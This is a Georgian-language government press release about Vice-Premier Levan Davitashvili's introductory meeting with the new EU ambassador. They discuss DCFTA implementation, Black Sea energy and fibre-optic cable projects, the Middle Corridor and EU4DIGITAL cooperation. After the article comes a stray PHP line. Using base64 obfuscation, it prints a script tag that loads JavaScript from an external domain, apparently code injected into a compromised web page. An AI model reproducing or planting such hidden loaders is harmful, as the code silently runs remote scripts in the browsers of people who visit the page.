celsiusi
ავერსი საქკაბელი
ვიცე-პრემიერი, ეკონომიკისა და მდგრადი განვითარების მინისტრი ლევან დავითაშვილი ევროკავშირის ახალ ელჩს პაველ ჰერჩინსკის შეხვდა. შეხვედრას, რომელიც გაცნობით ხასიათს ატარებდა, ასევე დაესწრო მინისტრის მოადგილე გენადი არველაძე.
 
შეხვედრაზე მხარეებმა დადებითად შეაფასეს საქართველოსა და ევროკავშირს შორის ეკონომიკური ურთიერთობების განვითარების დინამიკა, განსაკუთრებით, ასოცირების შეთანხმების იმპლემენტაციის მიმართულებით. აღინიშნა, რომ საქართველო წარმატებით ახორციელებს შეთანხმებით აღებული ვალდებულებების შესრულებას, რაც დადებითად აისახება საქართველოს სავაჭრო-ეკონომიკური კავშირების გაღრმავებაზე ევროკავშირის სახელმწიფოებთან.
 
ვიცე-პრემიერმა ევროკავშირის ახალ ელჩს პოსტზე დანიშვნა მიულოცა და ახალ თანამდებობაზე წარმატებული საქმიანობა უსურვა. მან იმედი გამოთქვა, რომ მომდევნო წლებში საქართველოს ინტეგრაცია ევროპულ სტრუქტურებში კიდევ უფრო გაიზრდება.
 
ლევან დავითაშვილმა სტუმარს გააცნო საქართველოს ეკონომიკური ტენდენციები, მიმდინარე და დაგეგმილი რეფორმები, რომლებიც უზრუნველყოფენ ქვეყნის ეკონომიკის მდგრად და სტაბილურ განვითარებას. განსაკუთრებული აქცენტი გაკეთდა ევროკავშირთან ღრმა და ყოვლისმომცველი თავისუფალი სავაჭრო სივრცის შეთანხმების (DCFTA) ფარგლებში აღებულ ვალდებულებების შესრულების პროცესზე.
 
მხარეებმა ასევე განიხილეს რეგიონული მნიშვნელობის პროექტები, რომლებიც საქართველოს ინიცირებით ხორციელდება და მიზნად ისახავს სამხრეთ კავკასიის დერეფნის მეშვეობით ევროპისა და აზიის ბაზრების დაკავშირებას. მათ შორისაა, შავი ზღვის ენერგო კაბელის პროექტი, რომლითაც საქართველოსა და ევროკავშირის ენერგეტიკული გადამცემი ინფრასტრუქტურა ერთმანეთს დაუკავშირდება. ვიცე-პრემიერმა დიდი იმედი გამოთქვა, რომ ამ პროექტს ევროკავშირის მხრიდან მხარდაჭერა იქნება, ხოლო პროექტი ამოქმედების შემდეგ დიდ როლს შეასრულებს ორივე რეგიონის ენერგეტიკული უსაფრთხოების შენარჩუნებაში.
 
ასევე განიხილეს თანამშრომლობა ტრანსპორტისა და ლოგისტიკის სფეროში. აღინიშნა, რომ საქართველოს მთავრობა აქტიურად მუშაობს ტრანსკასპიური, ე.წ. შუა დერეფნის განვითარებაზე, რომელიც უმოკლესი სატრანსპორტო მარშრუტია ევროპასა და აზიას შორის. ითქვა, რომ ქართული მხარე დაინტერესებულია უფრო მჭიდროდ ითანამშრომლოს ევროკავშირთან ტრანსევროპული სატრანსპორტო ქსელის (TEN-T) ფარგლებში, რათა საქართველოს სატრანსპორტო ინფრასტრუქტურა მეტად იყოს ინტეგრირებული ევროპულ სატრანსპორტო მარშრუტებში. აღნიშნული გაზრდის საქართველოს პორტების, რკინიგზისა და სხვა სატრანსპორტო ინფრასტრუქტურის მეშვეობით ტვირთების გამტარუნარიანობას, რომლებიც მოძრაობს ევროპასა და აზიას შორის.
 
მხარეებმა ასევე დადებითად შეაფასეს თანამშრომლობა EU4DIGITAL-ის ინიციატივის ფარგლებში, რომელიც მიმართულია საქართველოში ციფრული ეკონომიკის განვითარებისკენ. აღინიშნა, რომ საქართველოს მთავრობის პრიორიტეტული მიმართულებაა, გახდეს რეგიონის ციფრული მომსახურების ცენტრი. ამ მიზნით, განიხილება ქვეყანაში ციფრული ჰაბის ჩამოყალიბება და ევროპა – აზიის დამაკავშირებელ ციფრულ დერეფანში, რომლის ნაწილიცაა საქართველო, საერთაშორისო ინვესტიციების მოზიდვა. შეხვედრაზე დასახელდა კიდევ ერთი ფლაგმანური პროექტი შავი ზღვის ფსკერზე გამავალი ოპტიკურ-ბოჭკოვანი კაბელის სახით, რომელიც დააკავშირებს საქართველოს ევროკავშირის ქსელთან. აღინიშნა, რომ ქართული მხარე მიესალმება ამ მნიშვნელოვანი პროექტის განხორციელების პროცესში ევროკავშირის ჩართულობას და მხარდაჭერას, რომელიც ხელს შეუწყობს საქართველოს თანამშრომლობას ევროკავშირის სახელმწიფოებთან.
 
ინფორმაციას ეკონომიკისა და მდგრადი განვითარების სამინისტროს პრესსამსახური ავრცელებს. 
307
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");